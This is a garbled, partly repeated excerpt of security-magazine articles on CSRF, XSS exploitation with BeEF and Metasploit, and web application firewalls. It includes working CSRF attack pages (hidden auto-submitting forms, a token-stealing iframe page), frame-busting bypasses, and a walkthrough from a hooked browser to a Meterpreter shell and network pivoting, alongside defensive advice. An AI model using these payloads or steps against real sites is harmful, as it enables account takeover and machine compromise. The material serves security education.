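// Encode the five characters that are significant in an HTML body context.
// The ampersand must be replaced first so that the entities produced by the
// later replacements are not double-encoded.
function encodeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// The reflected payload from the earlier example is rendered inert:
console.log(encodeHtml("<script>alert(document.domain)</script>"));
// &lt;script&gt;alert(document.domain)&lt;/script&gt;
```

With the output encoded this way, the browser displays the attacker's script as text instead of executing it.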
Conclusion
In a nutshell, we can conclude that even a single parameter vulnerable to XSS can result in the complete compromise of a user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email: arvinddoraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
• Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers also exist.
• Requiring multi-step transactions: CSRF attacks can simply perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking users to type the text from a CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the currently active session of an authorized user.
Listing 1 HTML code used to bypass protection
<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com" >
<input type="submit" >
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)
And the webpage which processes the request stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value
A browser's settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks of this kind is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location)
</script>
A FrameKiller consists of a conditional statement and a counter-action statement. Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so that they can be compared after the form is submitted.
Subverting one-time tokens is usually attempted by brute-force attacks. Brute forcing one-time tokens is worthwhile only if the generation mechanism is predictable and widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2 Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3 Correct token
<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = "URL"
document.write('')
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1
<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2: Using double framing
<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker opens the webpage in a browser with JavaScript disabled, because the page content then simply remains hidden.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006 and then began studying web programming and web security concepts in earnest, gaining knowledge in web design, web programming techniques and information security. This experience shaped Samvel's work ethic: he pays attention to each line of code, both for optimization and for protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection and CSRF (Cross-Site Request Forgery). He is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4 Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" >
<input type="hidden" name="token" value="" >
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. Browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of ever more powerful applications that provide the internet user with the required functions as quickly and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly, simply and in as many ways as possible. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security, however, is often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security level was based solely on how the individual developers rated this aspect and how deep their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. Attackers gain access to the browser via infected web applications, and thereby to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems behind it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who carry the big responsibility here towards all those who use their applications, a responsibility which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. Conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer sufficient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should be correspondingly higher as well.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and for making actions anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security in the internet had not yet been raised. There were hardly any threat scenarios, particularly in the first years of web usage, because the attackers' focus was directed at the internal IT structure of the companies.
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
WEB APPLICATION CHECKING
Page 40 http://pentestmag.com 01/2011 (1) November
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now, the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have started to combine the methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch the weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible in the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free under the required application conditions and security aspects, according to predefined guidelines. Companies would have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but, above all, expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not just use the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are to be developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered over time, and by this time correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or as an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The safer a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection Systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory, but actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing Web Application Security.
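To illustrate that last point, here is a minimal, hypothetical sketch (in Python; the WAFs discussed here are commercial products, so this is not any vendor's rule) of a quote-stripping filter, together with an injection that never uses a quote and therefore passes it untouched:

```python
# Hypothetical sketch of the quote-filtering rule described above:
# the WAF strips inverted commas (quotes) out of incoming parameter values.
def filter_quotes(value: str) -> str:
    return value.replace("'", "").replace('"', "")

# A classic quote-based injection loses its quotes...
assert "'" not in filter_quotes("' OR '1'='1")

# ...but a purely numeric injection needs no quotes at all,
# so the filter passes it through unchanged:
assert filter_quotes("id=1 OR 1=1") == "id=1 OR 1=1"
```

This is exactly why the article warns that filtering special characters does not always prevent an attack based on the SQL Injection principle.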
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also conduct load balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
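The parameter rules just described can be sketched as follows; the form profile, the parameter names and the limits are invented for illustration and not taken from any real WAF:

```python
import re

# Hypothetical profile for one monitored entry form: which parameters exist,
# their maximum length and their permitted character set.
FORM_PROFILE = {
    "username": {"max_len": 32, "pattern": re.compile(r"^[A-Za-z0-9_]+$")},
    "age":      {"max_len": 3,  "pattern": re.compile(r"^[0-9]+$")},
}

def request_allowed(params: dict) -> bool:
    # Block requests that carry unknown (or simply too many) parameters.
    if set(params) - set(FORM_PROFILE):
        return False
    # Enforce length and character-set rules per parameter.
    for name, value in params.items():
        rule = FORM_PROFILE[name]
        if len(value) > rule["max_len"] or not rule["pattern"].match(value):
            return False
    return True

assert request_allowed({"username": "alice", "age": "33"})
assert not request_allowed({"username": "alice", "age": "33", "x": "1"})  # extra parameter
assert not request_allowed({"username": "alice' --", "age": "33"})        # invalid characters
```

Tightening the pattern and length limits is the plain-code equivalent of the "general rules about parameter quality" mentioned above.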
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
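The access-rate rule mentioned above can be sketched as a sliding-window limiter; the class name and the thresholds are illustrative assumptions, not a vendor implementation:

```python
import time
from collections import defaultdict, deque

# Hypothetical sliding-window rate limiter: once a client exceeds
# max_requests within the window, further requests are blocked, which
# blunts brute-force guessing and simple Denial of Service attempts.
class RateLimiter:
    def __init__(self, max_requests: int, window_seconds: float):
        self.max_requests = max_requests
        self.window = window_seconds
        self.hits = defaultdict(deque)  # client IP -> recent request timestamps

    def allow(self, client_ip: str, now: float = None) -> bool:
        now = time.monotonic() if now is None else now
        q = self.hits[client_ip]
        # Drop timestamps that have fallen out of the window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max_requests:
            return False
        q.append(now)
        return True

limiter = RateLimiter(max_requests=3, window_seconds=10.0)
results = [limiter.allow("10.0.0.1", now=t) for t in (0.0, 1.0, 2.0, 3.0)]
assert results == [True, True, True, False]  # 4th request in the window is blocked
assert limiter.allow("10.0.0.1", now=20.0)   # window has passed; allowed again
```

The "finely adjustable guidelines" of a real WAF correspond to tuning `max_requests` and the window per URL or per client class.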
Figure 2 An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. However, in practice a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
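The combined approach can be sketched like this; the blacklist signatures and the "learned" profile are invented examples, not a real WAF rule set:

```python
import re

# Hypothetical negative-security signatures (blacklist) applied everywhere.
BLACKLIST = [re.compile(p, re.I) for p in (r"<script", r"union\s+select", r"\.\./")]

# Hypothetical whitelist profile "learned" from observed traffic,
# kept only for a high-value sub-section (an order entry page).
LEARNED_PROFILE = {"/order/entry": {"item_id", "quantity"}}

def inspect(url: str, params: dict) -> str:
    # Blacklist first: block known-bad patterns in any parameter value.
    for value in params.values():
        if any(sig.search(value) for sig in BLACKLIST):
            return "block: blacklist signature"
    # Whitelist second, but only where a learned profile exists.
    allowed = LEARNED_PROFILE.get(url)
    if allowed is not None and not set(params) <= allowed:
        return "block: parameter not in learned whitelist"
    return "allow"

assert inspect("/order/entry", {"item_id": "42", "quantity": "1"}) == "allow"
assert inspect("/order/entry", {"item_id": "<script>alert(1)</script>"}).startswith("block")
assert inspect("/news", {"q": "hello"}) == "allow"  # page without a whitelist profile
```

Pages without a learned profile fall back to the blacklist alone, which mirrors the templated-negative-profile-plus-selective-whitelist design described above.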
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that are in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Certain special functions are also only available here: as a Full Reverse Proxy, a WAF provides for example Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses and, as such, the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Level 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization.

Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult

Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But the Proxy WAFs must also be configured to correspond with the respective terms. Penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. The companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic occur via a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there a simple SSL encryption for the data traffic, even if the application or the server do not support this?
• Are all known and unknown threats blocked?
A further point is the protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF with Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then this in practice makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:
• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War
Available to download on December 22nd.
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
- The Significance Of HTTP And The Web For Advanced Persistent Threats
- Web Application Security and Penetration Testing
- Developers are from Venus, Application Security guys from Mars
- Pulling the Legs of Arachni
- XSS, BeEF, Metasploit Exploitation
- Cross-site Request Forgery: IN-DEPTH ANALYSIS • CYBER GATES • 2011
- First the Security Gate, then the Airplane: What needs to be heeded when checking web applications
WEB APP VULNERABILITIES
Page 32 http://pentestmag.com 01/2011 (1) November
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF under the Standard Modules and Browser Modules tabs which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and Get a Shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user browser
Figure 8. Starting Metasploit
Figure 9. The "jobs" command
Figure 10. Metasploit after clicking "Send Now"
Figure 11. Meterpreter window - screenshot 1
Figure 12. Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point in time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13 Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output (as in the first point) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
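The encoding step above can be sketched with Python's standard library; `render_comment` is a hypothetical helper name, and the OWASP cheat sheet referenced above covers the full set of context-specific rules beyond this HTML-body case:

```python
import html

# Hypothetical helper: encode user input before reflecting it into HTML.
def render_comment(user_input: str) -> str:
    # html.escape converts &, <, > and (with quote=True) " and '
    # into their HTML entities, so the input cannot break out of the markup.
    return "<p>" + html.escape(user_input, quote=True) + "</p>"

rendered = render_comment('<script>alert("xss")</script>')
assert rendered == "<p>&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;</p>"
```

With the payload encoded, the browser displays the script text instead of executing it.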
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user input, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System, Network and Web Application Penetration Testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com" style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
• Only accepting POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
